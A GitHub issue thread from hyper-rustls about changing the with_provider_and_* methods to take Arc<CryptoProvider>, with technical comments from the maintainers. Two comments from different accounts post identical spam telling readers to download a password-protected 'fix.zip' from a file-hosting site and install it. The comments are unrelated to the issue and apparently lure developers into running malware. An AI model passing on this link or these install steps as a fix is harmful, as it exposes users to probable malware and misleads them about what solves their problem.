### ISSUE TITLE
make `with_provider_and_*` take `Arc<CryptoProvider>` instead of `CryptoProvider`

### ISSUE THREAD

**Issue by cpu** [rustls/hyper-rustls#282]
Suggested by `Adrian` in [discord](https://discord.com/channels/976380008299917365/1015156984007381033/1272237736132087871):
> Hey there, seems like hyper-rustls' with_provider_and_* methods take a CryptoProvider, meaning that it's impossible to call CryptoProvider::get_default() in a library and pass that as the argument (since getting an owned value out of the Arc is not really possible). I think the API should take an Arc<CryptoProvider>, just like rustls' ClientConfig::with_provider, which it calls internally (by creating an Arc via .into()).

Ctz mentioned _impossible_ might be an overstatement (e.g. due to [`Arc::unwrap_or_clone()`](https://doc.rust-lang.org/std/sync/struct.Arc.html#method.unwrap_or_clone)) but in general there was agreement that the API should be changed to take an `Arc`.

We should consider making this change alongside future breaking API changes.

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by uno-zero** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by djc** [comment]
On the rustls side I think we used an `impl Into<Arc<T>>` to make this change (somewhat) backwards compatibly. Might be an option here?
